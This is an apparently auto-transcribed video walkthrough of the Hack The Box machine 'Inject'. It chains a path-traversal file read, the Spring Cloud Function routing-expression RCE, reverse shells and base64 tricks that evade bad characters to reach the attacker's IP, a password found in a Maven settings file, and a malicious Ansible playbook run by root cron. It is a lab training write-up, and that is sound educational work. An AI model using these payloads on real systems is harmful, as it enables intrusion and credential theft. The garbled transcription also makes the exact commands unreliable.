what's going on YouTube this is IPS I'm doing inject from hack the box and I really like this box because the vulnerability is part of the framework that is hosting it is the spring Cloud config server but the web server doesn't make it super apparent it is using that the first Recon you do you discover it is probably a tomcat box which means it's running a Java application and the web server also has a file disclosure vulnerability in the image upload functionality so you can leak the contents of any file on the disk now since you know it's Tomcat Java has this weird Quirk where if you just open a directory the contents of that directory would be a directory listing so you can use that file disclosure to leak the contents of directories find the palm.xml file which is like the requirements start text and python it lists all the libraries the application is using and from there you can discover it's running the spring Frameworks specifically the spring Cloud config server Google and exploit get a foothold on the box and the root is abusing an ansible Playbook so with that being said let's just jump in as always I'm going to start with an end map so Dash SC for default scripts as V enumerate versions OA operate all formats but in the nmap directory and call it inject and then the IP address of 10 10 11.204 this can take a while to run so I've already ran it looking at the results we have just two ports open the first one being SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have this thing saying nagios nsca on port 8080 it scripts the NSE scripts that ran off looks like it's an HTTP page so let's go and check it out so I'm going to go to 10 10 11 204 port 8080 and it is going over to burps week so let's turn intercept off and we just get a page I'm actually going to turn intercept back on because I want to look at the server headers just to see if there's like a something saying nogus in this header right um I don't see anything like I was expecting server nagus nsea or X powered by since I don't see anything I'm guessing this is just the default for nmap if it sees something on port 8080 it can identify for some reason it's saying nag years but um I'm not going to trust nmap just because I don't see it with my own eyes so let's take a look at this web server um I'm going to test just index.php to see if it's a PHP web server and we get this error message which looks very much like a tomcat error message to me um I'm just doing it based upon experience and eyes if you've looked at Tomcat it probably stands out I don't think there's anything that specifically says Tomcat here but um it definitely is right we can try slash manager to see if there's anything there we could try like um the directory traversal trick with dot dot semicolon I want to say it is we just get a bad request and that's not working because we don't have nginx or Apache in front of it right um and generally we would know if Apache or nginx is in front of it because it sets the server header over HTTP request so I'm just going to set up go Buster so we have it running in the background so we'll do gobuster Dash U um HTTP 10 10 11 204 for 8080 word list up seclist Discovery web content raft small words dot text out file we'll just do gobuster.l so with that running we can take a look at what we can do on this page if I click login nothing happens if I click sign up we go to a under construction page looking at just the site uh there is a free if I click Start now can't do anything on any of these start now's but there's not much we can do there is this upload piece so if I click on upload we have a file upload form I'm just going to try uploading the readme.license and we get only image files are accepted so I'm gonna go find an image file so we'll just do fine slash Dash name star dot jpeg um I'm actually going to specify the user directory and we'll take this greenbone banner.jpg image so let's go back here paste this in upload it and then we can view our image and then this HTTP parameter image equals um this looks very much like a file inclusion thing for me so we should test by putting a bunch of dot dot slashes and then at z-pass WD and we see the image can't be displayed because it contains errors I'm going to send this over to burp Suite so we can easily actually see the contents and we can see the pass WD contents do come out there's also two users I notice I see Frank or Phil and Frank so two users here um nothing else too interesting since this is uh tomcat and it's a Java application we can actually get directory listings from this lfi so in Java if you do a open call on a directory it treats that directory as a file with the contents of it being the directory listing and this is something that I think is somewhat unique to Java it doesn't work in python or a lot of other languages but it is handy because we no longer have to guess at like file names right if I just do dot dot slash we can see um we're in this directory this is probably the inside of the Java app as we have uploads if I go up one more we have Main and test if I go up one more this would be the Parent Directory of the Java application and this is the one I'm really after because this has pom.xml which is going to be a listing of all the libraries this Java thing uses so if I do pom.xml we could download this so if I I'm just going to copy and paste it so we'll do copy paste and let's go vpom.xml paste it in and we can explore this a little bit more so we'll revisit pom.xml in a second I just want to see if I also can get like the Java source so if we do Source main this is where we were so if we go Java then let's see com example web app and then web application web app application dot Java did I misspell that let's copy this paste we can get start getting the source code of this application as well um that's just spring application I'm sure if we went into the user directory we have user.java as well so if you wanted to see exactly how this worked we could but the key thing is going to be the pom.xml file because that's going to be all the dependencies it actually uses right here we're looking at how it handles the file upload but the pom.xml let's take a look at it we can see just all the dependencies and the versions so we can see this bring framework and around the time this box released I want to say there was a lot of spring vulnerabilities right but I'm not going to memorize all of those the way I would handle this is opening this up in Visual Studio code and using sneak to identify any vulnerabilities so if I go over to sneak the open source code security scanner is going to find this pom.xml file and tell if there's any Library problems um it doesn't look like it ran let's see it's scanning click to see problems if I go over to this one away from the language server the code open source dependencies I see the code scan is trying to run Maven and we do not have Maven so I'm just going to add Maven to the Box there's pseudo apt install maven put it in and it shouldn't take too long and once we have the mvn command hopefully sneaks code security thing we'll find it right so now we have it um I probably should not have ran that it just download a bunch of things I think let's just uh run this again so I don't see any error messages it says success so I'm thinking we are good so hopefully this finishes in the next like 5 or 10 seconds I would say I'm gonna pause the video but soon as I say that it's going to finish but I guess I will pause the video and resume once this scan finishes and here we go we have palm.xml with a critical vulnerability if we click on it we can look at what sneak is telling us and let's see we got CBE 2022 22693 I'm just going to click on this and then I'm going to go over turn off burp Suite I'm just going to search GitHub POC and um this one looks good if we click on this it looks like there is a python script and let's see I think I used one that wasn't a python script let's go back maybe this top one because I actually just used a terminal prompt to exploit this let's see maybe this one we can use the python script if I don't find it or just make use of it it looks like all these are pretty much the same thing so I'm not going to run the script just because I think it's going to be less interesting um if we look at what it's doing it's setting the header this bring Cloud function routing expression and then the payload and that's essentially all we have to do and it's going to be a post request and the URL is going to be slash function router so the first thing to do is make sure function router exists so if we go over here we do a get on function router we get a 500 error if we put a d on the end of it it's 404 so we know this exists and we want to make this a post request and then all this is doing is setting spring Cloud routing function expression and then the payload so if we go with this and then what is payload look like so it's this foreign is going to be anything so I'm going to do user bin curl 10 10 14 8. uh Port 8000. so this is just going to be one to test if it works I think we need two line breaks at the end and let's do MC lvnp 8000 run it and we get a request so we know this works let's make a directory dub dub dub uh let's see actually we can try just a reverse Shell First so let's do past Dash I Dev TCP 10 10 14 8 9001 zero and one so NC ovmp 9001 send it we don't get a shell we can try doing bash Dash C and we still don't get a shell so my next step would be copying this payload and then we can put it in www as index.html paste that python3 Dash M HTTP server listener 9001 and we already know user bin curl 10 10 14 8 8 000 this works so I can pipe this over now to bash and once I add the pipe it no longer works we have two requests if I do pipe Bash we don't get one if I do bin bash Dash C let's try it this way we don't get anything either I get rid of the bin Bash still nothing so maybe the single quotes are a bad character if I get rid of single quotes still nothing um maybe the pipe is also a bad character so we can do Dash output temp shell and see if it saves it uh we need to get rid of bash Dash C so we have a request come in so I should be able to just exec tab shell so if I do bash temp shell we get a shell in the box now we could do this without um dropping anything to a file and the trick will be avoiding the bad characters so let me try this real quick um I'm gonna cat index.html so I can grab this payload I'm going to convert it to base64. so if I Echo base64 and I'm just going to get rid of the special URL type character so if I do a space here now that's all alphanumeric if I um do a space here that's good and then we want to get rid of the padding on the end so this all looks good so we now have just an alphanumeric string which has less Bad characters right so if I Echo um I should just be able to Echo this and then base64 Dash D and pipe Over The Bash I was thinking I normally do Echo dash n that's why I paused for a second but if I do this and see lvmp 9001 that gets a shell so we have verified that our payload works so let us do I think it's bash Dash C and we can't use any um uh quotes after this so I'm going to take advantage of um brace expansion and Bash and if I do it this way put everything in squiggly brackets and then commas with spaces are I think it's going to work so we are not listening let's do nclvmp 9001 send it did not work let's see bin Bash let's see I wonder if I need to a dash i I did this before if I get exactly how I did this to evade all the bad characters let's just try running our payload so if I copy this put this pane command not found oh we have a space that looks better but it did not run our payload without the bash it did so I wonder if it's because I forgot that dash n earlier let's just remove this one space because this definitely caused an issue so we're listening nope that was it it was just the space um the dash n thing I'm talking about when I made the base64 string I just did Echo so let's see where is it where's up here right um Echo was it down here I'm not exactly sure where I made it but um whatever pain it was that I made it in I was just doing Echo then bash Dash I I didn't do a dash m M and normally I do but it doesn't look like that Dash end is actually needed so let's get a show let's do python3-c import PTY pty.spawn Ben Bass sdty uh we need to background it with control Z sdty raw minus Echo FG enter enter and let's export term is equal to X term so I can clear the screen and we can take a look at this box we are the Frank user so if I go in my home directory we don't really have too much there we have this M2 directory which I don't recognize I'm just going to do a fine dot dash type f and we have settings.xml so if I look at this we have uh Phil and his password so what is this file for um I'm guessing it's some Maven type thing or something I don't know exactly what the M2 directory is uh what is the dot M2 directory uh default folder for Maven to store its settings which has like repository information so I'm guessing it's like um someone has their get credentials in the dot get folder if something is how I equate this right so we have fill and then this password and Phil was a user so if I grew up for everything that ends with SH on Etsy past WD we do have root Frank and Phil so I'm going to try the password for fill so if i s u Dash fill try to log in we can we can also test if this works with um SSH so if we did SSH fill at 10 10 11 um 204 right this is 10 10 11 204 put this in and we can't log in so Phil cannot log in Via SSH which is good because if he could um we could also access this file most likely from the lfi right so if we did a bunch of dot dot slashes uh probably one more and then go home fill dot M2 no it's Frank it looks like Phil gave Frank just his Maven configuration right so now we can access the fill user and we have user.txt here if we do find dot dash type f we need this we don't really have anything if I do let's do sudo Dash L put in the password uh wrong clipboard Phil may not run it we can find slash Dash user fill output to two devnoll and see what files Phil owns and we probably want a high process and run so let's do a grep dash V um anything that begins with proc then or anything begins with CIS or anything that begins with run and we see Phil just has things in home and that's it so if I look at my groups Phil is also a member of staff so if we do find Dash group staff we can see there is this opt automation task and a bunch of ansible stuff um let's do a dash writable to see if we can write to these things um there we go my terminal like size was set weirdly um we can write to opt automation tasks so let's look at exactly what this is if we cat Playbook one it's just a simple thing to make sure uh the web app service is enabled and system d so let's see um we do lsla we can't write to this Playbook so we should figure out exactly um what is executing this right and piece by is a really good thing to look at this point if I look at opt I don't think I have piece by on this box so let's go and download it GitHub P spy and I will have to add these to my ansible um Playbook to install parrot if you don't know about that if you do ipsec or github.com ipsec slash parrot build this is the repository for um building the exact VM you see me use here right so I'm going to add things so you don't have to go and add all these packages manually if you have questions about this Playbook if you go youtube.com ipsec then we have a playlist here of building parrot that I go over all that ansible stuff which if anything I'm saying about ansible doesn't make sense here that Playbook is a um or the building and uh parrot is a good video series to watch so let's look at the releases here we'll do piece by 64 small save it to downloads we can move downloads piece by here and let's set up our web server and let's go Dev shm wget 10 10 14 8 8 000 piece by 64 small it's h mod plus X on the file and we can run piece by uh we probably don't want the small then let's just download the regular piece by 64. um the small they stripped some of the symbols and it's not compatible with all versions of g-lib C as my guess it would happen there so let's move downloads piece by here start the web server back up W get it uh that was chmod W get it Sage mod plus X piece by 64. execute it and now we should just wait for a minute or two and see if anything comes up that is being ran on the system and there is a lot of things that just happened so let's look at exactly what kicked off this ansible so going up we have a cron ansible parallel and it's running everything in op automation tasks that ends in Dot yaml so this we can just create our own Playbook right so what I'm going to do go back to opt automation tasks and we had right access to this directory so I'm going to V shell.yaml and then we just have to specify um the stuff and I'm just going to actually copy Playbook one to shell.yaml so we have a lot of the boilerplate stuff done and instead of the system d I'm going to use the shell and then we can do a CMD of bash Dash C bash Dash I Dev TCP 1010 14 8 90001 zero and one like that and then delete these two lines save it let's step our web or a listener I'm gonna do a date real quick to see the time we have 30 seconds so we can clear this up and just say sending a shell and I think this is all we need so if I look at date uh we have about 15 seconds left I guess we can do Deb shm execute piece by again just so we can see um ansible run in case we don't get a shell and maybe we can do some type of troubleshooting but more importantly we can just see exactly when this cron fires if it's every minute or every two minutes we see it running now and we got the shell so again if you're confused at exactly what happened um a better thing would do is just do a cron tab Dash L to list the crons and let's see this is the Cron job we exploited so it's running ansible parallel which just runs multiple playbooks at once and the running all playbooks and opt automation tasks so if we go now root we could get the flag so hopefully you guys enjoyed the video take care and I will see you all next time